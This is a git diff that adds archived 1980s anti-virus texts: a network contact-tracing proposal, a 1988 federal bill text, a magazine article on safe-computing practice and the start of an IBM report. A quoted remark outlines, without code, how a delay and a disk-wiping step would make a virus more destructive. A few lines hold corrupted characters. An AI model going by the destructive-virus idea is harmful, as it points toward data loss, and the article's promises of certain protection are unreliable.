+individual actions or programs. This permits a highly desirable 
+heterogeneity in diagnostic and treatment methods.
+
+Definition: "Hormone . . . 1: a product of living cells that circulate 
+in body fluids or sap and produces a specific effect on the activity of 
+cells remote from its point of origin; especially one exerting a 
+stimulatory effect on a cellular activity. 2: a synthetic substance 
+that acts like a hormone (Webster's new collegiate dictionary, 1976)." 
+The analogy here is between each network node or computer system and 
+the cell. In biological systems hormones attach to specialized 
+receptors on the cell surface resulting in cell activation. In the 
+system described here, a match between a code in a system archive and a 
+code delivered as part of an alerting message results in activation. 
+Alerting messages circulated electronically serve the role of hormones. 
+
+Epidemiology has traditionally had three major approaches to the 
+control of infectious agents:
+
+:1 - Treatment of the sick (e. g., penicillin)
+
+:2 - Contact tracing (e. g., social-work notification programs, laws 
+forcing the reporting of certain diseases and of contacts of infected 
+persons)
+
+:3 - Prevention (e. g., vaccination, public information campaigns)
+
+In computer system terms:
+
+:1 - Treatment of infections (e. g., various programs and manually 
+installed patches and fixes)
+
+:2 - Contact tracing (e. g., software "recall", and other manual 
+operations)
+
+:3 - Prevention (e. g., various programs for blocking virus 
+replication, alerting users, and for logging suspicious events)
+
+Contact tracing has been neglected with computer systems, although it 
+could be argued it is much easier with computer systems than with 
+biological systems. Currently such tracing depends upon people reading 
+reports and determining if their system is subject to infection, 
+performing diagnostic tests, determining a treatment method, obtaining 
+software, and so on. This is chancy and time consuming, requiring most 
+often people with the highest level of expertise. As computers and 
+networks speed up, an infectious agent could spread through a network 
+in hours or minutes. "Once a virus has infected a large number of 
+computers on a network, the number of infected removable media elements 
+will begin to skyrocket. Eventually, if the virus continues to go 
+undetected, a stage is reached in which the probability of identifying 
+and recovering all of the infected media is virtually zero (McAfee, 
+1989)." An automated contact tracing system thus seems essential in the 
+future if infectious agents are to be controlled.
+
+3.   Threats
+
+"The modification of an existing virus to incorporate a long term delay
+(such as 6 months or even a year) coupled with a totally destructive
+manipulation task (such as a FAT, Boot sector scribble followed by a
+complete format) is a fairly simple task. Such an action would convert
+even a crude virus strain such as the Lehigh 1 virus into a
+devistating (sic) strain. (Eg the comment by Ken that the modified 
+version of the Lehigh virus is now far more dangerous due to 
+modification of the delay in activation of its manipulation task) 
+(Ferbrache, 1989)."
+
+Scott (1989) requested comments on:
+ 
+"A little future speculation here... currently we seem to be fighting a
+losing battle against virus detection and as viruses improve it's
+unlikely that that will change.  If we want the capability to download
+shareware, etc, from bulletin boards, etc, then we must assume that we
+cannot check the software for a virus with 100% success before running
+it.  In general, you can't know the output of a program given the
+input without running it, except in special cases.
+ 
+We can check for *known* viruses; but how long before shape-changing
+and mutating viruses hit the scene that defeat all practical
+recognition techniques?"
+
+An inapparent infection could spread rapidly, with damage noted only 
+much later. Consider a worm that is constructed to carry a virus. The 
+worm infects a system, installs the virus and then infects other nearby 
+systems on the net. Finally, it terminates erasing evidence of its 
+existence on the first system. The virus is also inapparent, it waits 
+for the right moment writes some bits and then terminates destroying 
+evidence of its existence. Later the worm retraces its path reads some 
+bits, then writes some bits and exits. The point is that an inapparent 
+infection could spread quite widely before it was noticed. It also 
+might be so hard to determine whether a system was infected or not, 
+that it would not be done until damage was either immanent or apparent. 
+This analysis suggests response to network-wide problems would best be 
+on a network level. 
+
+4.   Theory of operation
+
+Computers generate (in the simplest case) random numbers which are used 
+to label transactions. A transaction is defined as an interaction 
+capable of transmitting an infectious agent. After each transaction 
+both systems therefore have a unique label or code for that 
+transaction. In the event that a system is identified as infected, the 
+transaction codes which could represent transactions during which the 
+agent was transmitted are broadcast to all other computers. If a 
+receiving computer has a matching code, then that system is alerted to 
+the possibility of the agent's presence, and can broadcast transaction 
+codes accumulated after the suspect contact. This iterates the process, 
+thus identifying all carriers eventually. The effect is to model the 
+epidemiological process, thereby identifying all carriers through 
+forward and backward transaction tracking (Stodolsky, 1979a; 1979b; 
+1979c; 1983; 1986). 
+
+5.   The process of infection control
+
+The process can be broken down into routine and alerting operations. 
+During routine operations, each file transfer is labeled in a way that 
+does not identify the systems involved. These labels are time stamped 
+(or have time stamps encoded in them). They are written into archives 
+on each system, ideally write-once/read-many times devices or some 
+other type of storage that could not easily be altered. 
+
+Alerting procedures are invoked when an infectious agent is noted or 
+when a suspect transaction code is received that matches one in the 
+system's archive. The earliest time the agent could have arrived at the 
+system and latest time (usually the moment the agent is noted or a 
+received suspect transaction code is matched) it could have been 
+transmitted from the system are used to delimit suspect transaction 
+codes. These codes are broadcast to alert other systems to the 
+potential presence of the agent.
+
+In the simplest and most common case, if a system gets an alert that 
+indicates, "You could have been infected at time one," then the system 
+automatically packages the transaction codes between time one and the 
+present time to generate a new alert indicating the same thing to other 
+systems with which it has had contact. 
+
+Another automatic response could be to immediately cut off 
+communications in progress, thus reducing the risk of infection. A 
+further benefit of such a reaction would be the possibility of 
+disrupting the transfer of an infectious agent. Such a disrupted agent 
+would be harmless and easily identified and evaluated. Reestablishment 
+of communication could occur immediately with new procedures in force 
+that could warn new users that an alert was in progress as well as 
+limiting the type of transfers that could take place.
+
+5.1.   Practical considerations
+
+Direct identification, as opposed to identification through forward 
+tracing notification, does not delimit effectively the earliest time 
+that an agent could have been present on a system. Thus an alert from 
+an originating system could include all transaction codes written prior 
+to the identification (or some default value). This could generate 
+excessive reaction on the network. This reaction could be controlled if 
+another system in a later alert indicated it had originated the 
+infection on the system originating the alert. Thus, protection of 
+identity which reduces any inhibition about reporting infection is 
+important. The type of reaction discussed here might be called a panic 
+reaction, because an excessive number of systems might be notified of 
+potential infection in the first instance. 
+
+A more restricted response could be generated if persons at the alert 
+originating system analyzed the causative agent, thereby hopefully 
+establishing the earliest time the agent could have been present on 
+that system. In this case, the suspect transactions could be delimited 
+effectively and all systems that could have been infected would be 
+notified, as would the system that had transmitted the agent to the 
+system originating the alert (assuming one exists). Ideally, each 
+notified system would be able to determine if it had received or 
+originated the infection and respond accordingly. 
+
+5.2.   Forward tracing assumption
+
+Assume, however, that rapid response is desired. Each notified system 
+would then react as if it had been notified of an infection transmitted 
+to it. It would package the transaction codes that had been written 
+later than the suspect transaction code it had received and issue a 
+secondary alert. This forward tracing assumption would lead to quite 
+effective control because of the exponential growth in the number of 
+infected hosts in epidemics (and exponential growth of alerts resulting 
+>From forward tracing). That is, a system can infect many others as a 
+result of a single infective agent transmitted to it. Forward tracing 
+would alert all systems that the alerting system could have infected. 
+These newly alerted systems would also issue forward trace alerts, and 
+this would continue until containment was reached under the forward 
+tracing assumption.
+
+5.3.   Backward tracing of suspect contacts and diagnosis
+
+As a result of this rapid forward tracing response, it is likely that 
+more active infections would be identified. The resulting new 
+information could be used to more effectively characterize the life 
+cycle of the agent, thereby hopefully permitting effectively delimited 
+backward tracing. Also as a result of accumulated information, positive 
+tests for the agent would become available. Once this stage had been 
+reached the focus of action could shift from control of suspect 
+transactions to control of transactions known to facilitate the 
+transmission of the agent.
+
+6.   Feasibility and Efficiency
+
+Both technical and social factors play a key role in the operation of 
+the control mechanism. Contact tracing is probably most effective for 
+sparsely interacting hosts. The rate of transfer of the infectious 
+agent as compared to the rate of transfer of the suspect transaction 
+codes is also a critical factor. Recording of transactions can be 
+comprehensive on computer networks, however, unregistered transactions 
+will be a factor in most cases. Once the infectious agent has been 
+identified, the type of transactions capable of transmitting the agent 
+can be delimited. This could increase efficiency. 
+
+6.1.   Social organization of alerts
+
+Another major efficiency factor is errors in origination of alerts. 
+Since protected messages would trigger network-wide alerts, it is 
+important that false alarms are controlled effectively. On the other 
+hand, failure to report an infection could permit an infectious agent 
+to spread in an uncontrolled manner and could increase the number of 
+systems unnecessarily alerted. Successful operation of the mechanism 
+described above assumes voluntary cooperation among affected systems. 
+This assumption could be relaxed by application of an enforcement 
+mechanism. It would require substantially greater complexity and 
+greater centralization of coordination. In other words, if cooperation 
+was not forthcoming "voluntarily", users would likely be treated to a 
+complicated, restrictive, and resource intensive mechanism that would 
+be developed to enforce it. "Estimates of the damages inflicted by 
+November's Internet infection alone ranged upward of $100 million . . . 
+(McAfee, 1989)." Costs of this magnitude make it very likely that even 
+expensive enforcement mechanisms will be developed if they are made 
+necessary.
+
+The simplest organizational strategy would assume that protection of 
+identity was not needed, but this would also be likely to inhibit 
+alerting. True anonymity, however, permits irresponsible behavior to go 
+unchecked. A reputation preserving anonymity (pseudonymity) would be 
+desirable to ensure both protection and accountability and thereby 
+promote cooperation. Pseudonyms would best be the property of persons 
+(in association with a computer system). 
+
+Even sincere cooperation, however, would not eliminate inefficiencies 
+resulting from false alarms or failure to alert. Both inadequate 
+training and poor judgement are likely sources of these errors. If 
+users realize that there are reputational costs associated with these 
+failures, then they are likely to be motivated to minimize them. False 
+alarms are already a major problem because of user inexperience and the 
+high level of defects in widely used software. A reputational mechanism 
+would motivate increased user education and more careful software 
+selection, with a corresponding pressure on software publishers to 
+produce well behaved and carefully documented products. 
+
+6.2.   Enforcing cooperation
+
+Crypto-protocols could be used to ensure that a non-cooperator could 
+not communicate freely with others using the infection control 
+mechanism. This type of communication limiting could be used routinely 
+to ensure that a system requesting connection was not infected. In 
+effect, systems would exchange health certificates before file 
+exchanges, to ensure that they would not be infected. A system that 
+could not show a health certificate could be rejected as a conversation 
+partner due to risk of infection. This would no doubt enforce 
+cooperation. The mechanism (Stodolsky, 1986) is beyond the scope of 
+this note.
+
+6.3.   Non-network transfers
+
+While the discussion above has focused on transfers through networks, 
+the same principles could be applied to disk or tape transfers. The 
+originating system would write a transaction code on the medium with 
+each file. Protection of identity would possibly be reduced under this 
+type of transfer. Since there is no question about the directionality 
+of transmission of an infectious agent in off-line transfers, non-
+network transmission is likely to be easier to control. Several other 
+factors, such as the rate of spread of the agent, are likely to make 
+such infections less troublesome. 
+
+7.   Summary and Benefits 
+
+The idea behind Net Hormones is to make immanent danger apparent. More 
+precisely Net Hormones permit the visualization of infection risk. 
+
+7.1.   Control of unidentified infectious agents.
+
+Net Hormones work by permitting isolation of infectious hosts from 
+those at risk. Identification of the infectious agent is not required 
+for action. Therefore, new and as yet unidentified agents can be 
+effectively controlled.
+
+7.2.   Rapid response
+
+Hosts could automatically respond to alerts by determining if they had 
+been involved in suspect contacts, and generate new alerts that would 
+propagate along the potential route of infection. 
+ 
+7.3.   Protection of identity
+
+The mechanism could function without releasing the identity of an 
+infected host. This could be crucial in the case an institution that 
+did not wish it to be publicly know that its security system had been 
+compromised, or in the case of use of unregistered software. More 
+precisely, software obtain by untraceable and anonymous file transfers 
+could be protected by this mechanism without release of users' 
+identity.
+
+7.4.   Distributed operation
+
+Operation is not dependent upon a centralized register or enforcement 
+mechanism. Some standardization would be helpful, however, and a way to 
+broadcast alerts to all potential hosts would be valuable.
+
+8.   References
+
+Ferbrache, David J. (1989, February 10). Wide area network worms. 
+VIRUS-L Digest, V. 2 : Issue 44. [<davidf@CS.HW.AC.UK> <Fri, 10 Feb 89 
+11:45:37 GMT>]
+
+McAfee, J. D. (1989, February 13). In depth: Managing the virus threat. 
+Computerworld, 89-91; 94-96.
+
+Scott, Peter. (1989, February 10). Virus detection. VIRUS-L Digest, V. 
+2 : Issue 44. [PJS%naif.JPL.NASA.GOV@Hamlet.Bitnet 
+<pjs@grouch.jpl.nasa.gov>. <Fri, 10 Feb 89 10:46:21 PST>]
+
+Stodolsky, D. (1979a, April 9). Personal computers for supporting 
+health behaviors. Stanford, CA: Department of Psychology, Stanford 
+University.  (Preliminary proposal)
+
+Stodolsky, D. (1979b, May 21). Social facilitation supporting health 
+behaviors. Stanford, CA: Department of Psychology, Stanford University. 
+(Preliminary proposal)
+
+Stodolsky, D. (1979c, October). Systems approach to the epidemiology 
+and control of sexually transmitted diseases. Louisville, KY: System 
+Science Institute, University of Louisville. (Preliminary project 
+proposal)
+
+Stodolsky, D. (1983, June 15). Health promotion with an advanced 
+information system. Presented at the Lake Tahoe Life Extension 
+Conference. (Summary)
+
+Stodolsky, D. (1986, June). Data security and the control of infectious 
+agents. (Abstracts of the cross disciplinary symposium at the 
+University of Linkoeping, Sweden: Department of Communication Studies). 
+
+Webster's new collegiate dictionary. (1976). Springfield, MA: G. & C. 
+Merriam
+
+-------------------------------------------------------------
+
+David Stodolsky                          diku.dk!stodol@uunet.UU.NET
+Department of Psychology                       Voice + 45 1 58 48 86
+Copenhagen Univ., Njalsg. 88                    Fax. + 45 1 54 32 11
+DK-2300 Copenhagen S, Denmark                         stodol@DIKU.DK
+
+
\ No newline at end of file
diff --git a/textfiles.com/virus/hr5061.vir b/textfiles.com/virus/hr5061.vir
new file mode 100644
index 00000000..196d71ca
--- /dev/null
+++ b/textfiles.com/virus/hr5061.vir
@@ -0,0 +1,61 @@
+The following is the text of proposed federal legislation imposing
+possible fines, jail sentences and civil liability on purveyors of
+computer viruses and other harmful programs. The title of the Act is
+"The Computer Virus Eradication Act". It was sponsored during the
+1988 session of Congress by Congressman Wally Herger, 26th District,
+California.
+
+                            H.R.5061
+
+                             A BILL
+
+To amend title 18, United States Code, to provide penalties for persons
+interfering with the operations of computers through the use of
+programs containing hidden commands that can cause harm, and for
+other purposes.
+
+Be it enacted by the Senate and House of Representatives of the
+United Sates of America in Congress assembled.
+
+
+Section 1. Short Title.
+
+This Act may be cited as the "Computer Virus Eradication Act of
+1988".
+
+Section 2. Title 18 Amendment.
+
+      (a) IN GENERAL.---Chapter 65 (relating to malicious mischief) of
+title 18, United Sates Code, is amended by adding at the end the
+following:
+
+"Sec. 1368. Disseminating computer viruses and other harmful
+computer programs
+
+    "(a) Whoever knowingly---
+
+    "(1) inserts into a program for a computer information or
+commands, knowing or having reason to believe that such information
+or commands will cause loss to users of a computer on which such
+program is run or to those who rely on information processed on such
+computer; and
+
+    "(2) provides such program to others in circumstances in which
+those others do not know of the insertion or its effects;
+
+or attempts to do so, shall, if any of such conduct affects interstate or
+foreign commerce, be fined under this title or imprisoned not more
+than 10 years, or both.
+
+    "(b) Whoever suffers loss by reason of a violation of subsection (a)
+may, in a civil action against the violator, obtain appropriate relief. In
+a civil action under this section, the court may award to a prevailing
+party a reasonable attorney's fee and other litigation expenses.".
+
+
+    (b) CLERICAL AMENDMENT.---The table of sections at the
+beginning of chapter 65 of title 18, United States Code, is amended by
+adding at the end the following:
+    "1368. Disseminating computer viruses and other harmful computer
+programs.".
+
\ No newline at end of file
diff --git a/textfiles.com/virus/hysteria.vir b/textfiles.com/virus/hysteria.vir
new file mode 100644
index 00000000..1d4a23a3
--- /dev/null
+++ b/textfiles.com/virus/hysteria.vir
@@ -0,0 +1,360 @@
+            Reprinted from CompuMag, Vol. 1 (1989), Issues 3 and 4
+               For subscription information call 1-805-273-0300
+
+                                  Virus Hysteria!
+
+                                by Richard B. Levin
+
+                 You're scared.  Having heard how computer viruses leap
+            from computer to computer, you've learned your system could
+            be the next unwitting sufferer of a computer flu.  After
+            all, your friend has a friend whose cousin knows someone
+            that witnessed a virus display "Arf!  Arf!  Gotcha'!" as it
+            gobbled up data on an office PC.  And your local BBSes are
+            bubbling over with heated horror stories about bombs,
+            Trojans and viruses, not to mention countless
+            recommendations for anti-virus software products.  It seems
+            that every new day brings with it stories of impending
+            computerized doom, created by evil geniuses with programming
+            abilities far beyond those you or your associates could ever
+            hope to achieve, much less do battle against.
+
+                 Relax!  Hysteria over computer viruses comes in waves.
+            The hysteria is fueled, in large part, by the popular press'
+            frenzied, poorly researched and consistently inaccurate
+            reporting on the subject.  Computer crime is not a new story
+            and viruses are simply the latest plot twist.  Vandals
+            sending "time-bombs" and viruses into our nation's telephone
+            network are akin to hackers breaking into corporate or
+            government mainframe computers and scrambling data--the
+            techniques they use for sowing destruction may differ, but
+            their intent and results are the same.  Before you hang up
+            your joystick in disgust, however, realize that computer
+            vandalism has been with us, in one form or another, since
+            the first CRT was fired-up and will remain until the last
+            disk drive grinds to a halt.  In any public endeavor there
+            will be an anti-social element; computing is no exception.
+            In the interest of "safe computing," the question we must
+            ask is "how do we protect ourselves from the ravages of the
+            computer criminal and computer viruses?"
+
+                 If you choose not to ignore the reality of computer
+            viruses, there remains three ways to dispense with the
+            problem:  virus prevention software, virus detection
+            software and safe-computing practices (which includes
+            anti-virus software usage, among other things).  As with
+            other forms of crime prevention, virus prevention software
+            products may provide an effective deterrent in some cases;
+            they fail, however, when the criminal element is determined
+            to perpetrate criminal acts.  Most virus prevention software
+            products have serious technical drawbacks users naturally
+            overlook (we're not all computer scientists) and virus
+            developers exploit.  For example, not one of the anti-virus
+            software programs on the market today can protect a system
+            from a deadly disk "write" that bypasses DOS by directly
+            manipulating the disk controller.  Users of virus prevention
+            products believe their computers are ImZ]�Y������ in
+            reality,`taey're sitting ducks, safeguarded only from the
+            simplest of viruses.
+
+                 Fact:  it is physically impossible to prevent all
+            manner of viruses from entering your system; no matter how
+            many automobile alarms you may install, if the crooks want
+            to steal the wheels badly enough, they will.  This same line
+            of reasoning remains true in the area of virus protection:
+            if the virus developer is determined to breach your system,
+            your system will be compromised.  You can, however, detect
+            viral infections almost immediately after they occur, which
+            allows you to rapidly eradicate the invaders and prevent
+            future infections.  By employing the following "safe
+            computing" measures (excerpted from the documentation that
+            accompanies my CHECKUP virus detection system) and by
+            installing a reliable virus DETECTION system, you are
+            guaranteed a measure of security virus PREVENTION software
+            can never provide:
+
+                 *    Run CHECKUP (or another reliable virus
+                      detection system) daily.  CHECKUP provides a
+                      sanitary, clean floppy disk/batch file method
+                      that is capable of detecting any virus, past,
+                      present or future.
+
+                 *    Run major applications via DOS batch files
+                      and have CHECKUP (or another reliable virus
+                      detection system) perform a pre-run,
+                      last-minute ci�ck of programs about to run.
+
+                      Using CHECKUP, for example:  instead of
+                      typing the "WORD" command to run Microsoft
+                      Word, create a batch file named "WRD.BAT"
+                      that reads as follows:
+
+                           CD \WORD
+
+                           CHECKUP WORD.COM
+                           IF ERRORLEVEL 1 GOTO EXIT
+
+                           CHECKUP WORD_DCA.EXE
+                           IF ERRORLEVEL 1 GOTO EXIT
+
+                           CHECKUP MAKEPRD.EXE
+                           IF ERRORLEVEL 1 GOTO EXIT
+
+                           CHECKUP MERGEPRD.EXE
+                           IF ERRORLEVEL 1 GOTO EXIT
+
+                           CHECKUP MW.PGM
+                           IF ERRORLEVEL 1 GOTO EXIT
+
+                           CHECKUP SPELL-AM.EXE
+                           IF ERRORLEVEL 1 GOTO EXIT
+
+                           WORD
+
+                           :EXIT
+
+                      In the future, use the WRD command to invoke
+                      Microsoft Word.  CHECKUP will examine all of
+                      Microsoft Word's executable files and will
+                      allow them to run if (and only if) they pass
+                      CHECKUP's scrutiny.  Of course, unlike
+                      Microsoft Word, many applications have only
+                      one principal executable file to check,
+                      greatly simplifying implementation of pre-run
+                      checking through DOS batch files.
+
+                 *    Regularly check and log available disk space.
+                      Aggressive viruses decrease storage space as
+                      they spread throughout a system.  This
+                      activity can be identified through rigorous
+                      monitoring.
+
+                      The following commands, added to
+                      AUTOEXEC.BAT, will track disk usage:
+
+                           CD \
+                           DIR >> DIR.LOG
+                           TYPE DIR.LOG > PRN
+
+                 *    Observe the time it takes for programs to
+                      load--infected files take longer.  Programs
+                      exhibiting longer than normal load times
+                      might be infected (see next tip for related
+                      information).
+
+                 *    Scrutinize disk accesses whenever possible.
+                      Viruses can spend large amounts of time
+                      scanning directories and executable files as
+                      they search for new, uninfected host files.
+                      Programs conducting longer than normal disk
+                      I/O, especially during load-time, might be
+                      infected.
+
+                 *    Periodically re-install applications from
+                      their master disks.  This overwrites
+                      application files in use and any viruses
+                      incubating within them.
+
+                 *    Once a week, use the SYS command to
+                      re-install the system files onto your boot
+                      disk(s).  This eliminates viruses lurking in
+                      the boot sectors.
+
+                 *    Use the DOS "SHELL" command to rename and
+                      relocate COMMAND.COM to a directory other
+                      than the root of your boot disk.  Then place
+                      a different copy of COMMAND.COM in the root
+                      directory.  This may divert viruses into
+                      infecting the decoy copy instead of your
+                      actual command processor.  Refer to your DOS
+                      reference manuals for information on the
+                      SHELL command.
+
+                 *    Boot from a certified clean floppy disk copy
+                      of your DOS master disks whenever possible.
+                      This insures your system is running under an
+                      uncorrupted operating system at all times.
+
+                 *    Change executable file attributes to
+                      read-only.  Poorly engineered viruses may not
+                      be able to alter read-only files.  Executable
+                      files are those ending in a .BAT, .COM or
+                      .EXE extension or loaded in CONFIG.SYS.
+
+                      Many programs write to their master
+                      executable file when saving configuration
+                      information.  If such a file has been
+                      converted to read-only, the read-only
+                      attribute must be removed before
+                      re-configuring and reset afterward.
+
+                      There are many utilities that can reset file
+                      attributes, including ATTR.COM, available for
+                      downloading from the PC-Magazine Network on
+                      CompuServe.  CompuServe users can "GO
+                      PCMAGNET" to download ATTR.COM.  If you own
+                      the Norton Utilities, use Norton's FA.EXE to
+                      change attributes of COMMAND.COM to read-only 
+                      using Norton's FA, enter:
+
+                           FA COMMAND.COM /R+
+
+                      Some versions of DOS provide an ATTRIB (or
+                      similar) command.  Check your DOS reference
+                      manuals for more information on modifying
+                      file attributes.
+
+                 *    Use extreme caution when working with FAT and
+                      directory editors, directory sorters, disk
+                      optimizers, file movers, format-recovery
+                      systems, partition-related tools, un-erasers
+                      and other low-level DOS utilities.  These
+                      programs manipulate critical data and one bug
+                      or errant keystroke can annihilate a disk.
+                      Additionally, DOS shells should be treated
+                      with care as they also handle critical disk
+                      information.
+
+                      Safe bets for low-level disk management are
+                      the Norton Utilities, Advanced Edition, from
+                      Peter Norton Computing, Inc.; PC-Tools from
+                      Central Point Software and the Mace Utilities
+                      from Paul Mace Software.  Among DOS shells,
+                      we recommend the Norton Commander, also from
+                      Peter Norton Computing, Inc.  These programs
+                      are available at most computer retailers.
+
+                 *    Do not run files downloaded from public
+                      access BBSes (bulletin board systems) that do
+                      not validate users who upload.  If the SysOp
+                      of a bulletin board did not contact you
+                      directly (by phone, mail or automatic
+                      callback), you can be certain that other
+                      users have not been validated.  (SysOps:  If
+                      validating users is a burden, a practical
+                      alternative is to validate them after they
+                      upload their first file.)
+
+                 *    Do not run files downloaded from public
+                      access BBSes where the SysOps do not test and
+                      approve all files.
+
+                 *    Do not run files provided by shareware/public
+                      domain disk distributors, including your
+                      local users group, where the disk librarians
+                      do not test and approve all files.
+
+                 *    Do not run self-extracting archives unless
+                      they have been tested.  Self-extracting
+                      archives are a classic delivery method used
+                      by bomb developers.
+
+                 *    Beware of suspicious-looking files.  A 128
+                      byte .COM file that un-archives without
+                      documentation and whose description reads
+                      "Great Word Processor" is suspect.
+
+                 *    Use a binary file-viewing utility (like the
+                      one included in the Norton Commander) to
+                      examine executable code.  Look for suspicious
+                      comments and messages embedded in the code.
+
+                 *    Do not run programs unaccompanied by
+                      well-written documentation prepared by the
+                      program's author.
+
+                 *    Do not run programs that do not include the
+                      name, address and telephone number(s) of the
+                      author within the documentation or
+                      executable(s).
+
+                 *    Call program authors and verify the version
+                      number, time and date stamps, file sizes and
+                      archive contents of files you have received.
+  !�                  Ask authors where you can get certified clean
+                      copies of their programs, then discard the
+                      copies you have and get the certified copies.
+
+                 *    Download shareware direct from the author's
+                      BBS.  Most professional shareware authors
+                      provide support BBSes for their products.
+                      You are guaranteed uncorrupted programs when
+                      you download them directly from their
+                      authors.
+
+                 *    Do not use hacked or pirated software.
+                      Software pirates have the skill and the tools
+                      needed to create bombs and viruses.  Many
+                      reported incidents of viral infections have
+                      been associated with software piracy.  In
+                      fact, some of the deadliest Trojans have been
+                      modified copies of well-known applications.
+
+                 *    Back-up your system regularly!  No system
+                      exists in a vacuum, nor is any anti-virus or
+                      anti-Trojan technique foolproof.  Back-up on
+                      a daily, weekly and monthly basis.  When
+                      disaster strikes, users who have regularly
+                      backed-up their systems will have the last
+                      laugh (and their data)!
+
+                 If you are not using a virus detection system or you
+            are using a less-than-perfect virus detection system, how
+            can you tell if a virus has landed on your system and begun
+            eating away at your precious data?  The following
+            guidelines, also excerpted from CHECKUP's documentation,
+            will help you identify the viral warning signs:
+
+                 1.   Computer operations seem sluggish.
+
+                 2.   Programs take longer to load.
+
+                 3.   Programs access multiple disk drives when
+                      loading where they didn't before.
+
+                 4.   Programs conduct disk accesses at unusual
+                      times or with increased frequency.
+
+                 5.   Available disk space decreases rapidly.
+
+                 6.   The number of bad disk sectors steadily
+                      increases.
+
+                 7.   Memory maps reveal new TSR programs of
+                      unknown origin.
+
+                 8.   Normally well-behaved programs act abnormally
+                      or crash without reason.
+
+                 9.   Programs encounter errors where they didn't
+                      before.
+
+                 10.  Programs generate undocumented messages.
+
+                 11.  Files mysteriously disappear.
+
+                 12.  Names, extensions, dates, attributes or data
+                      changes on files that have not been modified
+                      by users.
+
+                 13.  Data files or directories of unknown origin
+                      appear.
+
+                 14.  CHECKUP (or another reliable virus detection
+                      system) detects changes to static objects
+                      (files).  Changes detected to dynamic objects
+                      are not an indication of viral alterations.
+
+                 Rest assured that neither you nor anyone you know will
+            suffer a major data loss from a viral attack if
+            safe-computing measures are implemented religiously.  When
+            and if a viral infection is discovered, turn your computer
+            off and contact a good viral diagnostician for eradication
+            advice.  Do not use your computer or any floppy disks
+            associated with your computer until your system has been
+            thoroughly cleansed.  Above all, however, enjoy computing
+            and the thousands of quality public domain and shareware
+            programs at your disposal.  Take comfort in the knowledge
+            that safe-computing techniques, employed properly, will
+            serve to protect your data from harm.
+
\ No newline at end of file
diff --git a/textfiles.com/virus/ibmpaper.vir b/textfiles.com/virus/ibmpaper.vir
new file mode 100644
index 00000000..f577ef37
--- /dev/null
+++ b/textfiles.com/virus/ibmpaper.vir
@@ -0,0 +1,2377 @@
+ 
+ 
+ 
+ 
+ 
+ 
+          Coping with Computer Viruses and Related Problems
+ 
+          Steve R. White
+          David M. Chess
+          IBM Thomas J. Watson Research Center
+          Yorktown Heights, NY
+ 
+          Chengi Jimmy Kuo
+          IBM Los Angeles Scientific Center
+          Los Angeles, CA
+ 
+          Research Report (RC 14405)
+          January 30, 1989
+ 
+ 
+ 
+          This research report is provided without restriction;
+          we encourage its redistribution.
+ 
+ 
+ 
+ 
+ 
+          Copies may be requested from:
+ 
+          IBM Thomas J. Watson Research Center
+          Distribution Services F-11 Stormytown
+          Post Office Box 218
+          Yorktown Heights, New York 10598
+ 
+          (This report will be available from this address up to
+           one year after the IBM publication date (up to Jan 1990))
+ 
+ 
+          This online version differs from the hardcopy report only
+          in pagination, and in using *asterisks* for emphasis.  It
+          is formatted to print at 66 lines per page, and 80 or so
+          characters per line (including a 10 character margin on
+          either side).
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+                     Coping with Computer Viruses and Related Problems
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+                                                        Steve R. White
+                                                        David M. Chess
+                                  IBM Thomas J. Watson Research Center
+                                                  Yorktown Heights, NY
+ 
+                                                      Chengi Jimmy Kuo
+                                     IBM Los Angeles Scientific Center
+                                                       Los Angeles, CA
+ 
+ 
+ 
+ 
+ 
+                                       Research Report Number RC 14405
+ 
+                                                      January 30, 1989
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+          ABSTRACT
+ 
+ 
+ 
+          We discuss computer viruses and related problems.  Our
+          intent is to help both executive and technical managers
+          understand the problems that viruses pose, and to suggest
+          practical steps they can take to help protect their
+          computing systems.
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+          Abstract                                                  ii
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+ 
+          CONTENTS
+ 
+ 
+ 
+          1.0  Executive Summary   . . . . . . . . . . . . . . . . . 1
+          1.1  What Is a Computer Virus?   . . . . . . . . . . . . . 1
+          1.2  How Can Computer Viruses Affect an Organization?  . . 2
+          1.3  How Serious Is The Problem?   . . . . . . . . . . . . 2
+          1.4  Summary and Recommendations   . . . . . . . . . . . . 3
+ 
+          2.0  Coping with Computer Viruses: A Guide for Technical
+           Management  . . . . . . . . . . . . . . . . . . . . . . . 5
+          2.1  How Viruses Infect Computing Systems  . . . . . . . . 5
+          2.2  How Viruses Differ From Other Security Threats  . . . 6
+          2.3  General Security Policies   . . . . . . . . . . . . . 7
+            2.3.1  User Education  . . . . . . . . . . . . . . . . . 7
+            2.3.2  Backups   . . . . . . . . . . . . . . . . . . . . 7
+          2.4  Decreasing the Risk of Viral Infection  . . . . . . . 8
+            2.4.1  Isolated Systems  . . . . . . . . . . . . . . . . 8
+            2.4.2  Limited-Function Systems  . . . . . . . . . . . . 9
+            2.4.3  Policies for Software Repositories  . . . . . .  10
+            2.4.4  Policies for Production Systems   . . . . . . .  11
+          2.5  Detecting Viral Infections  . . . . . . . . . . . .  12
+            2.5.1  Watching for Unexpected Things Happening  . . .  13
+            2.5.2  Some Symptoms of Known Viruses  . . . . . . . .  13
+            2.5.3  Watching for Changes to Executable Objects  . .  15
+            2.5.4  Using External Information Sources  . . . . . .  17
+          2.6  Containing Viral Infections   . . . . . . . . . . .  17
+            2.6.1  The Importance of Early Detection   . . . . . .  17
+            2.6.2  The Importance of Rapid Action  . . . . . . . .  18
+          2.7  Recovering from Viral Infections  . . . . . . . . .  19
+            2.7.1  Restoration and Backups   . . . . . . . . . . .  19
+            2.7.2  Virus-Removing Programs   . . . . . . . . . . .  20
